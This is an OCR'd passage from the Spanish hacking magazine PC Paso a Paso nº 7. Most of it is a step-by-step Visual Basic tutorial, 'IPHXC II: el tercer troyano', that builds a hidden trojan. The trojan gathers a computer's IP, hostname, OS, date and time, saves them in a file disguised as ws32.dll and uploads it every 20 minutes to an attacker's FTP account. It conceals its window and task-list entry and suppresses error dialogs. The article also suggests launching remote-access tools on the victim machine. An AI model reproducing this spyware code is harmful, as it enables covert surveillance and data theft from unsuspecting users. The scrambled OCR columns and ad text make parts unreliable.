                TxtOper.Text = TxtOper.Text & "7"      Private Sub CmdPor_Click()
          End Sub                                        StrOper = "*"
                                                         LngValor = TxtOper.Text
          Private Sub Cmd8_Click()                       TxtOper.Text = ""
                TxtOper.Text = TxtOper.Text & "8"      End Sub
          End Sub
                                                       El próximo mes crearemos nuestro primer OCX
          Private Sub Cmd9_Click()                     (ActiveX control)
                TxtOper.Text = TxtOper.Text & "9"
          End Sub
                                                           PERSONALIZATUMOVIL
                                                           PERSONALIZATUMOVIL
                                                           PERSONALIZATUMOVIL MOVIL
                                                                           TUMOVIL
                                                                              MOVIL
                                                             PERSONALIZATUTUMOVIL
                                                                              MOVIL
                                                                              MOVIL
                                                                          TUMOVIL
                                                           PERSONALIZATUMOVILMOVIL
                                                                          TUMOVIL
                                                                             MOVIL
                                                            PERSONALIZATUMOVIL
                                                                             MOVIL
                                                              PERSONALIZA TUMOVIL
                                                            PERSONALIZATUMOVIL
                                                              PERSONALIZA TUMOVIL
                                                                             MOVIL
                                                             PERSONALIZA TUMOVIL
                                                            PERSONALIZATUMOVIL
                                                            PERSONALIZATU MOVIL
                                                                            MOVIL
                                                             PERSONALIZATU MOVIL
                                                             PERSONALIZATU MOVIL
                                                              PERSONALIZA
                                                              PERSONALIZA
                                                                  PERSONALIZATUMOVIL
                                                                  PERSONALIZATUMOVIL
                                                                  PERSONALIZATUMOVIL MOVIL
                                                                    PERSONALIZATUTUMOVIL
                                                                                     MOVIL
                                                                                     MOVIL
                                                                                     MOVIL
                                                                                 TUMOVIL
                                                                  PERSONALIZATUMOVILMOVIL
                                                                                    MOVIL
                                                                                 TUMOVIL
                                                                                    MOVIL
          Private Sub CmdDiv_Click()                                 PERSONALIZA TUMOVIL
                                                                                    MOVIL
                                                                   PERSONALIZATUMOVIL
                                                                    PERSONALIZA TUMOVIL
                                                                                    MOVIL
                                                                   PERSONALIZATUMOVIL
                                                                    PERSONALIZA TUMOVIL
                                                                                    MOVIL
                                                                   PERSONALIZATU MOVIL
                                                                   PERSONALIZATU MOVIL
                                                                                   MOVIL
                                                                    PERSONALIZA TU MOVIL
                                                                     PERSONALIZA
                                                                     PERSONALIZA
            StrOper = "/"
            LngValor = TxtOper.Text
            TxtOper.Text = ""
          End Sub

          Private Sub CmdIgual_Click()
            If StrOper = "+" Then
                   TxtOper = LngValor + TxtOper.Text
            End If
            If StrOper = "-" Then
                   TxtOper = LngValor - TxtOper.Text
            End If

            If StrOper = "*" Then
                   TxtOper = LngValor * TxtOper.Text
            End If                                                      HAY MUCHOS MAS EN
                                                                     http://pclog.buscalogos.com/
            If StrOper = "/" Then

PC PASO A PASO Nº 7                                                                                   Página 37
IPHXC II: EL TERCER TROYANO
       DE HACK X CRACK (PC PASO A PASO)


            El propósito de este articulo es fundamentalmente crear un programa, con las siguientes
            características:

            1.      Que nos envié a un ftp un archivo cada cierto tiempo programable por nosotros.
            2.      Que ese archivo contenga al menos el nombre del host, su IP, la plataforma Windows
            sobre la que se ejecuta, fecha y hora.
            3.      Que el programa "no se vea".
            4.      Que contenga el menor código posible.
            5.      Que sea TU programa.
            6.      Que puedas hacerlo "crecer"
            7.      Que al final pienses ¡¡¡¡¡Pues si que es fácil!!!!!

            Si queréis lo podéis llamar "troyano", aunque yo lo llamo IPHCX, un programa para practicar
            con VB.

            Antes de meternos en materia, necesitamos saber algunas cosas, no mucho, NO estoy
            intentando que al terminar de leer esto, te mires al espejo y te digas

                                        "Soyunprogramadordivinodelamuerte"

            No, no sonrías pensando -¡¡¡¡¡Empezamos bien, vaya errata!!!!!-, lo he puesto conscientemente.

            Antes hemos dicho cual era el propósito de este articulo, ahora te diré cual es el fin.
            Conseguir llamar tu atención sobre VB, que sepas al menos algunas de sus posibilidades,
            que "te atrevas" a investigar por tu cuenta, que pienses que algún día te gustaría aprender
            a programar, que al acabar de leer esto tengamos un programa funcional......solo eso, y
            te aseguro que no es poco.

            Entremos en materia que luego dicen que cuento mi vida y me enrollo mucho y que si le
            doy muchas vueltas y que si la abuela fuma y que...........(ya se me fue la olla).


            Parto de la base de que habéis leído el articulo   foco, que sabéis guardar un proyecto y que
            de la revista nº-6, y ya tenéis medianamente       entendéis y sabéis "compilar" vuestro proyecto
            claro conceptos como proyecto, controles y         para lograr un archivo ejecutable, que sabéis
            objetos, formulario, eventos y procedimientos,     "escribir cosas en los controles del formulario",

Página 38                                                                                           PC PASO A PASO Nº 7
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




          también haremos referencia a imágenes de la       Cada vez que pulsemos el command, el valor
          revista nº-6.                                     de Ti cambiara, el resultado lo veremos en el
                                                            caption del label. Ti es una VARIABLE, su valor
          En VB y en cualquier lenguaje de programación,    se modifica cada vez que pulsemos el command.
          necesitamos utilizar variables, ¿que son¿, Una
          variable es una ubicación temporal de             Antes de seguir, guardar vuestro proyecto, por
          almacenamiento de datos dentro de un              ejemplo creándola dentro de la carpeta c:PVB,
          programa. Pongamos un ejemplo practico, el        y llamarla IPHCX.
          IPHCX nos tiene que enviar un archivo cada
          cierto tiempo, necesitamos contar entonces        Existen diferentes "tipos" de variables, pero su
          ese tiempo, crearemos una variable que            explicación amplia será en el curso de VB, no
          llamaremos Ti, para crearla usaremos una          vamos ni siquiera a definir que tipo de variable
          instrucción llamada DIM (Dimensión),              es y porque en este articulo.

          Dim Ti           'declaración de la variable Ti   ¿Para que nos puede servir esta variable?,
                                                            Supongamos que queremos que cuando la
          Le daremos un valor a esa variable                variable Ti valga 10, ocurra "algo", utilizaremos
                                                            una "herramienta" que se llama expresión
          Ti=0             'le decimos al programa que      condicional, ¿Qué es una expresión condicional?
                           'Ti tiene un valor de cero       Es una parte de una sentencia de un programa
                                                            que realiza preguntas del tipo verdadero o falso
          Ahora, ponemos algún control que efectué una      sobre una variable, una propiedad o algún tipo
          operación de suma simple                          de datos del programa.

          Ti=Ti+1                                           Utilizamos para ello operadores de comparación:
                                                            =                 igual que
          Bien, cada vez, que se efectué esta operación     <>                distinto que
          Ti incrementara su valor en uno, esto es una      >                 mayor que
          variable.                                         <                 menor que
                                                            >=                mayor o igual
          Mas claro aun, inicia Vb, y en un proyecto        <=                menor o igual que
          nuevo, coloca un command y un label, después,
          copia este código:                                ¿Para que nos puede servir esto?, Las podemos
                                                            utilizar en estructuras de decisión,¿Qué son
          Dim Ti 'declaramos la variable                    estructuras de decisión? Las estructuras de
                                                            decisión nos sirven para evaluar una condición
          Private Sub Command1_Click()                      en el programa y ejecutar acciones de acuerdo
          Ti = Ti + 1 'se suma 1                            a ellas.
          Label1.Caption = Ti 'nos muestra en el caption
                              'el valor de ti               Para hacer esto utilizamos la
          End Sub                                           sentencias(estructura de decisión)
                                                            IF.....THEN....END IF.
          Private Sub Form_Load()
          Ti = 0                                            Lo mejor es verlo en la practica, volvamos a
          End Sub                                           nuestro pequeño programa, e incluyamos en


PC PASO A PASO Nº 7                                                                                             Página 39
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




            el evento click del command1 la siguiente              uno en nuestro proyecto, tratarlo como un si
            expresión:                                             fuera un command o un label para colocarlo
                                                                   en el form, la única diferencia es que cuando
            If Ti=10 then                                          ejecutemos el proyecto, ese control "no se
                                                                   vera".
            Shell("calc.exe") 'si no sabes que es esto, para,
                              'baja las practicas de la revista    Expliquemos este control un poco, este control
                              '6 y hazlas                          responde al paso del tiempo, se suele utilizar
                                                                   para ejecutar acciones a intervalos periódicos
            End if                                                 de tiempo. Entre sus propiedades veamos
                                                                   alguna de ellas.
            Nos quedara esto:
                                                                   Interval : Especifica el numero de milisegundos
            Private Sub Command1_Click()                           que transcurren entre un evento del timer y el
            Ti = Ti + 1 'se suma 1                                 siguiente. Este valor puede estar entre 0 y
            Label1.Caption = Ti 'nos muestra en el caption el      64.767, el mayor intervalo como veréis esta
                                    'valor de ti                   por encima de un minuto (aproximadamente
            If Ti = 10 Then 'si Ti es igual a 10 entonces haz lo   65 segundos). No son periodos de tiempo muy
                            'siguiente, sino, continua con el      exactos, dependen del estado de reloj del
                             'programa                             ordenador.
            Shell ("calc.exe") 'acción a ejecutar si se cumple
                                'la condición                      El control Timer tiene un solo evento que
            End If             'fin del bucle de decision          también se llama Timer, este evento se dispara
            End Sub                                                o funciona, cuando la propiedad interval del
                                                                   control timer se completa.
            Bueno, ejecutemos nuestro programa, cuando
            pulsemos por décima vez el command1 , la               Como siempre lo mejor es poner un ejemplo
            aplicación calculadora de Windows arrancara            en nuestro pequeño proyecto, ya hemos
            (o cualquier otra aplicación que pongamos).            colocado el control timer en nuestro formulario,
            No te cortes, cambia el valor de la línea If Ti        pasemos ahora a modo ver código, pongamos
            = 10 Then a 15 o 5 y prueba.                           en el control form, evento Load, (lo que
            Podemos cambiar también la línea de la acción          tengamos en ese evento es lo que ocurrirá al
            a ejecutar, y en lugar de arrancar la calculadora,     cargarse ese form, o sea al arrancar la
            arrancar por ejemplo servu.exe servu.ini -h            aplicación) la siguiente línea:
            (ojo a la ruta).
                                                                   Timer1.Interval = 1000
            Realmente seria complicado tener que pulsar
            10 veces un botón para obtener un resultado            Con esto lo que hacemos es que al arrancar
            en nuestro programa, tenemos que poner algo            nuestro proyecto, al cargarse (load) ponga en
            que lo haga por nosotros, y que podamos                marcha el cronometro, cuando el timer1
            "controlar",¿qué mejor que el "tiempo"?,               complete un segundo se active su evento Timer.
            Disponemos de un control en Vb para ello, se           ATENCION, no confundir control y evento timer,
            llama Timer, si miráis en el cuadro de                 aunque se llamen igual son cosas diferentes.
            herramientas -(¿qué?)-, revista 6, pagina 37,
            veréis un icono que se parece a un reloj o             Busquemos en el control timer1 y veamos que
            cronometro, revista 6, pagina 38, coloquemos           el único evento de que dispone es el de timer

Página 40                                                                                              PC PASO A PASO Nº 7
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




                                 (en la pagina 39 de la         Hasta ahora hemos estado viendo algunas
                                 revista 6 tenéis una figura    cosas que aunque no veamos realmente para
                                 que os puede servir de         que nos puedan servir nos serán muy útiles,
                                 referencia).                   ya es hora de que empecemos a ver nuestro
                                 En      ese      evento        programa de una manera mas concreta.
                                 escribamos lo siguiente
                                                                En el apartado 1 del propósito de este articulo,
                                 Call Command1_Click            hablamos de enviar un archivo, pero antes
                                                                tendremos que crearlo y escribir lo que
          Esta línea lo que hace es efectuar una "llamada"      necesitemos en él, VB tiene para esto una
          ( Call ) al control Command1 en su evento             instrucción que es Open, podríamos utilizar
          Click. Envía al programa a ejecutar el contenido      algo mas adecuado como la función
          d e l e ve n t o C l i c k d e l C o m m a n d 1 .    CreateObject y el método CreateTexFile, pero
                                                                creo que esa explicación es mas adecuada
          Al final nos quedara algo así como:                   durante el curso. No nos olvidemos que los
                                                                fines de este articulo, aun a riesgo de que algún
          Dim Ti 'declara la variable                           lector mas avanzado lo considere excesivamente
                                                                simple(de hecho esa es la idea del articulo, que
          Private Sub Command1_Click()                          sea lo más "simple" posible).
          Ti = Ti + 1 'se suma 1
          Label1.Caption = Ti 'nos muestra en el caption        ¿Cómo se crea un archivo, y se escribe
                       'el valor de Ti                          en él?
          If Ti = 10 Then
          Shell ("calc.exe")                                    Open ("prueba.txt") For Output As #1
          End If                                                Print #1,¨hackxcrack¨
          End Sub                                               Close #1

          Private Sub Form_Load()                               Expliquemos cada una de las líneas
          Ti = 0
          Timer1.Interval = 1000                                Open ("prueba.txt") For Output As #1
          End Sub                                               Nos crea un archivo llamado prueba.txt y lo
                                                                "abre" por el canal 1 para poder escribir al
          Private Sub Timer1_Timer()                            principio del mismo.
          Call Command1_Click
          End Sub                                               Print #1,¨hackxcrack¨
                                                                Escribe lo que tengamos entre comillas, en este
                                                                caso hackxcrack, al archivo asociado al
          Ahora ejecutemos nuestra aplicación, veamos           canal 1.
          que sin necesidad de "cliclear" sobre nuestro
          command, el label aumenta la cuenta, al llegar        Close #1
          a 10 segundos aproximadamente, arrancara              Cierra el archivo asociado al canal 1
          de nuevo la calculadora. Lo que hemos hecho
          es sustituir la intervención del usuario, colocando   En nuestro pequeño proyecto, utilizábamos la
          un control que en función del tiempo que              estructura de decisión IF.....THEN....END IF ,
          nosotros estipulemos, realiza una acción.             para arrancar la calculadora, borremos la línea


PC PASO A PASO Nº 7                                                                                                 Página 41
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




            Shell("calc.exe")                                  de dialogo, en la ficha componentes,

            Y en su lugar pongamos

            Open ("prueba.txt") For Output As #1
            Print #1,¨hackxcrack¨
            Close #1

            Ejecutemos nuestra aplicación, a los 10
            segundos mas o menos, se creara el archivo
            prueba.txt y dentro aparecerá la palabra
            hackxcrack.

            Poco útil seria crear un archivo para poner una
            cadena de texto solo, nosotros queremos mas
            cosas, entre ellas la IP del ordenador donde
            se ejecuta, para eso tenemos un control ActiveX
            en VB, concretamente el control
            MSWINSCK.OCX.

                                                               buscaremos y marcaremos Microsoft Winsock
  !           ¿qué son los ocx?...                             Control, aquí podréis encontraros con algo
                                                               diferente, de acuerdo a la versión y el SP que
 ¿qué son los ocx?, Son archivos que contienen un "mini-       tengáis, en mi caso veréis la versión 6.0 ,
 programa" ya "compilado", los tenemos como parte de VB,       Service Pack 5.
 añadidos por Microsoft y otros creados por empresas
 independientes, si miráis en vuestro ordenador encontrareis   Una vez marcado, le daremos a aceptar y nos
 muchos que no son parte del programa VB, se han cargado       aparecerá un nuevo icono en el cuadro de
 en vuestro ordenador al instalar alguna aplicación, el        herramientas, Winsock, coloquémoslo en el
 programador utilizo un ocx comercial u otro creado por        formulario. Al igual que el timer, esto control
 el.¿Por qué usarlos?, Facilitan la realización de programas   no es "visible" en modo ejecución( al arrancar
 y permiten que diferentes aplicaciones compartan estos        la aplicación).
 archivos. Por ejemplo, supongamos el típico calendario de
 Windows, en realidad es un ocx, que puedes usar en            El control Winsock tiene muchas opciones,
 diferentes programas, Microsoft lo usa en Access, Word,       nosotros para nuestro pequeño ejemplo, solo
 etc..                                                         utilizaremos dos, que nos proporcione la Ip y
                                                               el nombre del Host, donde el programa esta
                                                               corriendo.
            Si miramos en el cuadro de herramientas no
            lo veremos, tenemos que incluirlo puesto que
            por defecto no viene, veamos como, pulsemos            !            Este control...
            con el botón derecho encima del cuadro de
            herramientas, nos saldrá un menú emergente,           Este control es muy completo, tiene muchísimas propiedades
            del cual seleccionaremos Componentes,                 interesantes, casi da para efectuar un articulo por si solo,
            (también podemos hacerlo a través del menú,           no quedarse en esta vaga explicación, investigar por vuestra
            Proyecto-Componentes)nos saldrá un cuadro             cuenta.


Página 42                                                                                            PC PASO A PASO Nº 7
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




          Sustituyamos el texto que pusimos en la línea

          Print #1, "hackxcrack"

          Por esto otro

          Print #1, Winsock1.LocalIP
                                                            Lo ponemos en nuestro proyecto y a
          Observar que después de poner el punto os         continuación de la línea
          saldrá como siempre un menú en donde podéis
          elegir no solo localIP, también otras muchas      Print #1, Winsock1.LocalHostName
          propiedades.
                                                            Pondremos
          Ejecutemos nuestra aplicación, cuando pasen
          esos diez segundos, el archivo prueba.txt         Print #1, SysInfo1.OSPlatform
          contendrá la ip de nuestro ordenador.
                                                            Ejecutemos nuestra aplicación, nos creara en
          Hemos dicho también que queríamos saber el        nuestro archivo de texto una nueva entrada,
          nombre del host donde esta corriendo nuestro      puede ser parecido a esto
          programa, a continuación de la línea
                                                            169.254.33.198 - la iP
          Print #1, Winsock1.LocalIP                        Mimaskina      -El nombre del host
                                                            2              -el 2 nos indica que es
          Pongamos esta otra                                               Win NT/2000/XP


          Print #1, Winsock1.LocalHostName                  OSPlatform nos devuelve un valor que
                                                            corresponde al S.O.
          'nos proporciona el nombre del host
                                                            0-S.O.win sin identificar.
          Ejecutemos nuestro programa                       1-S.O. win95/98/ME
                                                            2- S.O Win NT/2000/XP
          Al cabo de los diez segundos,tenemos en
          nuestro archivo de texto, la IP y el nombre del   ¿Para que puede servir esto?, Puedo darte
          host.                                             algunas ideas, pero creo que un buen ejercicio
                                                            es utilizar vuestra imaginación, por
          Queremos tener también en ese archivo de          ejemplo,¿Recordáis la practica nº-1 de la revista
          texto algunos datos mas, por ejemplo , la         6?, Pues eso.
          versión Windows que esta corriendo, para ello
          utilizaremos otro control ActiveX,                Este control, tiene otras propiedades como son
          concretamente, el SYSINFO.OCX, tenemos que        OSBuild y OSVersion, nos proporcionan
          ponerlo en nuestro cuadro de herramientas,        información de la versión y S.O., evalúa si
          los pasos son igual que el anterior, solo que     necesitas esa información o no.
          en este caso seleccionaremos el control
          Microsoft Sysinfo Control.                        Podemos ser curiosos y poner alguna aclaración
                                                            en nuestro archivo de texto, por ejemplo,
                                                            modificar esta línea

PC PASO A PASO Nº 7                                                                                             Página 43
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




            Print #1, Winsock1.LocalIP         'IP del host     nombre de usuario, ejemplos serian: iespana,
                                                                terra, lycos, etc. Pues bien, esos son los datos
            Poniendo lo siguiente                               que necesitamos para acabar nuestro programa,
                                                                pasemos a la acción.
            Print #1, "IP del host ", Winsock1.LocalIP
                                                                Debajo de la línea
            Si ejecutamos nuestra aplicación, veremos en        Close #1
            nuestro archivo de texto, una aclaración:
                                                                Escribiremos lo siguiente
            IP del host 169.254.33.198
            Mimaskina                                           Inet1.Execute "ftp://USUARIO:PASS@ftp", "PUT
            2                                                   prueba.txt " & Winsock1.LocalHostName & ".txt"

            Solo nos falta escribir en este archivo, la fecha   Expliquemos esta línea de forma detallada:
            y la hora, de la maquina en la que esta             Inet1 -es la llamada al ocx
            corriendo. Para ello utilizaremos las               Execute - es el método que ejecuta una solicitud
            instrucciones, Time y Date. Pongamos lo             a un servidor remoto
            siguiente debajo de la línea "Print #1,             ftp:// -protocolo que utilizaremos
            SysInfo1.OSPlatform 'Plataforma win"                usuario -la clave de usuario que usasteis al
                                                                darte de alta en el ftp
            Print #1, Date                                      pass -la clave de tu cuenta ftp
            Print #1, Time                                      ftp -La dirección de tu FTP
                                                                "PUT          prueba.txt              "        &
            Ya tenemos casi listo nuestro programa, solo        Winsock1.LocalHostName & ".txt" .-copia
            nos queda enviarlo a nuestro FTP, para eso          el archivo local especificado(prueba.txt) en el
            utilizaremos otro control ActiveX diferente, en     host remoto especificado, con el nombre del
            concreto el Microsoft Internet Transfer Control     host local y extensión txt.
            (MSINET.OCX). La forma de añadirlo a nuestro
            cuadro de herramientas, ya la sabemos, así          Tal vez esta línea necesite alguna aclaración
            que adelante, e incluirlo en nuestro formulario     mas, la parte que hemos puesto &
                                                                Winsock1.LocalHostName & ".txt"
            Este ocx, permite utilizar dos protocolos
            ampliamente utilizados, como son, el protocolo      & Winsock1.LocalHostName & , utilizamos
            de transferencia de hipertexto (http), y el         el símbolo (&) por que dentro metemos una
            protocolo de transferencia de archivos (ftp).       variable, que es el nombre del host, a la cual
                                                                le añadimos la terminación txt. De esta manera,
            Nuestra idea es enviar el archivo prueba.txt a      aunque recibamos varios archivos en nuestro
            una cuenta FTP, necesitamos primero entonces        ftp, cada uno tendrá el nombre de la maquina
            conseguirnos esa cuenta, de esto ya se hablo,       en la que corra.
            pero por si alguien no se acuerda.
                                                                Llego al hora de probar nuestro programa,
            Hoy en día, multitud de alojamientos WEB,           arranquemos y a los diez segundos mas o
            nos ofrecen su espacio para que podamos             menos deberá de haber subido nuestro archivo
            colgar nuestras paginas, para subirlas nos          prueba.txt a nuestra cuenta ftp.
            proporcionan una cuenta FTP, solo tenemos
            que darnos de alta para obtener una clave y         Una de las características que queríamos del

Página 44                                                                                           PC PASO A PASO Nº 7
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




          programa, es que enviara el archivo cada cierto     en un ordenador diferente al nuestro,
          tiempo, si nos hemos fijado, vemos, que el          lógicamente "no puede verse", para esto
          label después de enviar el archivo al llegar a      incluiremos en nuestro código la siguiente línea
          diez segundos, sigue contando, tenemos que          en el form_load
          ponerlo a cero una vez que el archivo ha sido
          enviado, coloquemos la línea                        Form1.Visible = False

          Ti=0                                                Con esto conseguimos que el programa al
                                                              ejecutarse no sea "visible", no aparezca ningún
          Depues de                                           formulario.

          Inet1.Execute "ftp://USUARIO:PASS@ftp", "PUT        Bueno, ya casi esta, podemos todavía hacer
          prueba.txt " & Winsock1.LocalHostName & ".txt"      alguna cosa mas, por ejemplo, el archivo en
                                                              lugar de llamarse prueba.txt, lo podemos llamar
          Con esto, logramos iniciar de nuevo la cuenta,      como queramos incluida su terminación, un
          poniendo de nuevo el reloj a cero.                  nombre pudiera ser ws32.dll, eso ya es cuestión
                                                              de tu imaginación, aunque vigila de no poner
          Las cuentas ftp, hay veces que pueden no            un nombre de algún archivo que ya exista.
          funcionar, bien porque estén caídas, no
          reconozcan las pass o al usuario, estén             En nuestro programa, una vez que veamos que
          bloqueadas, etc. Podemos hacer una prueba,          nos funciona, esta claro que nos sobran cosas,
          elimina alguna letra de tu pass, ejecuta de         el label1 nos servia para ir "viendo" como
          nuevo el programa, veras que aparece una            reaccionaba el programa durante su diseño,
          pantallita indicándonos un fallo, concretamente     pero en realidad no nos hace ninguna falta,
          el 35780, esto nos indica que el servidor FTP       podemos eliminarlo, junto con las línea
          nos ha rechazado por contraseña incorrecta.
          Tenemos que hacer "algo" que en caso de que         Label1.Caption = Ti
          algún error ocurra, no salga ninguna pantalla
          de aviso, para eso colocaremos lo siguiente al      ATENCION: Si eliminas el control Label1 y no
          principio de cada evento                            eliminas la línea anterior, el programa te dará
          On Error GoTo Error                                 un fallo, puesto que no puede encontrar ese
          Y al final de cada evento(inmediatamente antes      control al que hace referencia el programa.
          de -End Sub- esta otra                              Error 424 en tiempo de ejecución: Se
          Error:                                              requiere un objeto.

          Con esto lo que hacemos es que si el programa
          detecta cualquier error,"salte" (GoTo) a la línea   Tenemos puesto un tiempo de diez segundos,
          indicada(Error), que tiene a continuación el        es excesivamente corto para nuestro programa,
          final del evento(End Sub).Es una manera de          al menos pongamos 15 minutos, aunque soy
          evitar "ventanitas" de errores, aunque lo ideal     de la opinión, de que una vez seria suficiente,
          es detectar el error, identificarlo y tratarlo de   en este caso como dijo el otro "hágase según
          forma adecuada.                                     arte", yo voy a colocarlo cada 20 minutos, para
                                                              eso sustituiré el valor de 1000 que teníamos
          Si ahora creamos el ejecutable, tendremos un        en la línea
          programa típico de Windows, para nuestra
          practica esta bien, pero si queremos que "corra"    Timer1.Interval = 1000

PC PASO A PASO Nº 7                                                                                              Página 45
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




            Por un valor de 60000                                           Form1.Visible = False 'oculta el formulario
                                                                            ti = 0 'pone a cero el tiempo
            Timer1.Interval = 60000                                         Timer1.Interval = 60000 'tiempo para disparar el
                                                                                                            'evento timer
            Con esto conseguimos que el evento timer se                     'aproximadamente 60 segundos
            ejecute cada 60 segundos (aproximadamente)                      Error:
                                                                            End Sub
            Sustituimos el valor de 10 de la línea                          ------------------------------------------------------------
                                                                            ------------------------
            If Ti = 10 Then                                                 Private Sub Timer1_Timer()
                                                                            On Error GoTo Error
            Por 20                                                          Call Command1_Click 'llama al evento click del
                                                                                                         'command1
            If ti = 20 Then                                                 Error:
                                                                            End Sub
            Ahora y aproximadamente cada veinte minutos
            se creara y enviara el archivo al ftp.
            Una vez terminado esto, nos debe de quedar                      Recordar que el apostrofe (' ) es para introducir
            un código parecido a este                                       comentarios, estas líneas están en verde, no
                                                                            forman parte del código del programa, es para
            Dim ti 'declaramos la variable                                  efectos informativos.
            ------------------------------------------------------------
            ------------------                                              Llegados a este punto, los propósitos que nos
            Private Sub Command1_Click()                                    marcamos al principio, están casi logrados, y
            On Error GoTo Error                                             digo casi porque ahora es cuando te toca
            ti = ti + 1 'se suma 1                                          hacerlo "crecer", aunque eso es precisamente
            If ti = 20 Then 'tiempo en minutos                              lo más bonito, que TU, seas capaz de seguir
            Open ("ws32.dll") For Output As #1 'crea el archivo             adelante, pero no creas que estas solo, tenemos
            Print #1, "IP del host ", Winsock1.LocalIP 'IP del              el foro, seguro que de hay salen las mejores
                                                                  'host     ideas y proyectos, para empezar podemos
            Print #1, Winsock1.LocalHostName 'nombre del                    incluir en nuestro programa la rutina de la
                                                       ' o rd e n a d o r   practica nº-1 de la revista 6, con eso
            Print #1, SysInfo1.OSPlatform 'Plataforma win                   conseguiremos que en maquinas win95/98/me,
            Print #1, Date 'fecha                                           permanezca oculto a Control-Alt-Supr, si nuestra
            Print #1, Time 'hora                                            maquina es winnt, en cualquiera de sus
            Close #1 'cierra el archivo                                     versiones, pongamos la línea
            Inet1.Execute "ftp://USUARIO:PASS@ftp", "PUT
            ws32.dll " & Winsock1.LocalHostName & ".txt"                    App.TaskVisible = False
            ti = 0 'pone a cero el tiempo
            End If                                                          En el evento load de nuestro Form, esto no lo
            Error:                                                          oculta de las tares en proceso, para eso
            End Sub                                                         tendríamos que utilizar otro concepto no
            ------------------------------------------------------------    explicado hasta ahora, que son las apis, y que
            ------------------------                                        durante el curso se explicaran.
            Private Sub Form_Load()
            On Error GoTo Error                                             Lo ideal es utilizar el menor numero de ActiveX

Página 46                                                                                                                PC PASO A PASO Nº 7
IPHXC II - EL TERCER TROYANO DE PC PASO A PASO




          en nuestros proyectos, ¿Por qué?, Tened en             La practica n-5 es un código que nos indicara
          cuenta que para que el programa funcione en            si el ordenador esta conectado a Internet. De
          una maquina diferente a la nuestra, necesita           esta manera y mientras este código no informe
          tener esos archivos en su sistema, o tenemos           de que efectivamente el ordenador esta
          que incluirlos al distribuir nuestro programa.         conectado a Internet, no enviara el archivo al
          "Casi" todos esos ocx mas las librerías                ftp, así evitamos la clásica ventanita de petición
          necesarias, "suelen" estar ya en la mayoría de         de conexión a Internet.
          los ordenadores, cualquier programa tipo P2P
          y muchas otras aplicaciones los incluyen.              Para ayudarnos con nuestros programas,
                                                                 tenemos tanto la ayuda del propio VB, que
          E n l a p a g i n a w e b e n c o n t ra r e i s u n   incluye ejemplos, hasta el msdn, tanto en disco
          ejemplo(practica 4) para saber la ip del               como en la pagina de Microsoft en Internet
          ordenador sin utilizar ocx, seria un buen ejercicio    (http://msdn.microsoft.com/) .
          el adaptar este código a nuestro proyecto,
          eliminaríamos un ocx.                                  Hasta aquí la segunda parte de este articulo,
                                                                 espero haber despertado vuestro interés por
                                                                 VB, recordar que esto es solo un pequeño
          ¿Que más podríamos poner en nuestro                    p r o g ra m a ( m u y i n c o m p l e t o ) y, s i n
          proyecto?, .... algunas ideas para entretenernos       excesivaspretensiones, para que TU lo sigas
          este mes, podríamos crear desde un pequeño             desarrollando, no te limites a copiarlo solo,
          FTP (cliente-servidor con el control Winsock),         investiga cada uno de los comandos que hemos
          hasta arrancar alguna "aplicación" ya utilizada        utilizado, acude a la ayuda (ya sabes -Cuando
          en otros números de la revista, como el serv-          todo falla.....léete el manual-) , utiliza el foro
          u o radmin, de acuerdo a alguna condición que          para pedir ayuda en tu proyecto, para exponer
          expresemos, con esto evitaríamos mas entradas           y compartir tus logros e ideas.
          en el regedit para arrancarlas de forma
          automática.


¿QUIERES COLABORAR CON PC PASO A PASO?
PC PASO A PASO busca personas que posean conocimientos
de  informática  y deseen   publicar   sus  trabajos.
SABEMOS que muchas personas (quizás tu eres una de
ellas) han creado textos y cursos para “consumo propio”
o “de unos pocos”.
SABEMOS que muchas personas tienen inquietudes
periodísticas pero nunca se han atrevido a presentar sus
trabajos a una editorial.

SABEMOS que hay verdaderas “obras de arte” creadas por
personas como tu o yo y que nunca verán la luz.
PC PASO A PASO desea contactar contigo!


NOSOTROS PODEMOS PUBLICAR TU OBRA!!!
SI  DESEAS     MÁS    INFORMACIÓN,        envíanos    un   mail   a
empleo@editotrans.com y te responderemos concretando nuestra oferta.

También necesitamos urgentemente alguien que se ocupe de la
publicidad y de la web de esta editorial, para más información
envíanos un mail a empleo@editotrans.com

PC PASO A PASO Nº 7                                                                                                      Página 47
APACHE: UN SERVIDOR WEB
             EN NUESTRO PC
          PARTE I: INSTALACION Y
       ACCESO AL SERVIDOR APACHE

                                       Atrévete a montar tu propio Servidor Web.
                                      Conoce lo que hay detrás de una página Web.
                                        Configura un Servidor Web DESDE CERO!!!
                                     La mejor forma de APRENDER es PRACTICANDO :)



            1.- Introducción: Conozcámonos.                      Al finalizar este capítulo tendrás tu propio
                                                                 servidor web y si tienes conexión a Internet,
            Antes de comenzar me voy a presentar. Soy            puedes colocar tu página web en tu servidor
            David Campoy, y trabajo como gerente de              web y darla a conocer al mundo sin que nadie
            proyectos de Internet en una empresa de              se percate de que el servidor lo tienes debajo
            análisis de datos. El objetivo de este curso es      de la mesa.
            que cualquier lector sin nociones de cómo
            poner en marcha un servidor web sea capaz            2.- Servidores web
            de instalar y configurar correctamente el servidor
            Apache. El curso será 80% práctico, dejando          Vamos a explicar de manera rápida y simple
            un 20% a la parte teórica, siempre es necesario      que es un servidor web para aquellos que se
            conocer algo de culturilla sobre el tema ¿no?.       inician en el tema. Si abres el navegador y
                                                                 pones www.hackxcrack.com lo que está
            Al finalizar el curso serás capaz de instalar el     haciendo tu navegador es conectarse a un
            servidor web Apache, crear sitios virtuales,         ordenador que puede estar en cualquier lugar
            configurar CGI, controlar el registro y estado       del mundo, e incluso puede estar alojado debajo
            del servidor, manipular la seguridad del servidor,   de la cama del webmaster. A los pocos segundos
            utilizar el servidor Proxy, instalación              el ordenador al que te has conectado te enviará
            DNS y mucho más. Si eres nuevo en el                 la información en formato HTML con imágenes,
            tema seguro que te sonará a chino todo esto,         sonido, flash, ...
            esto es bueno ya que aprenderás un sin fin de
            cosas, y lo mejor de todo es que es muy              ¿Qué tiene instalado el ordenador de hackxcrack
            divertido.                                           para que te envíe la página web solicitada?,
                                                                 pues tiene instalado un programa llamado
            Al tener tu servidor web instalado en tu propio      "servidor web", recuerda que el servidor
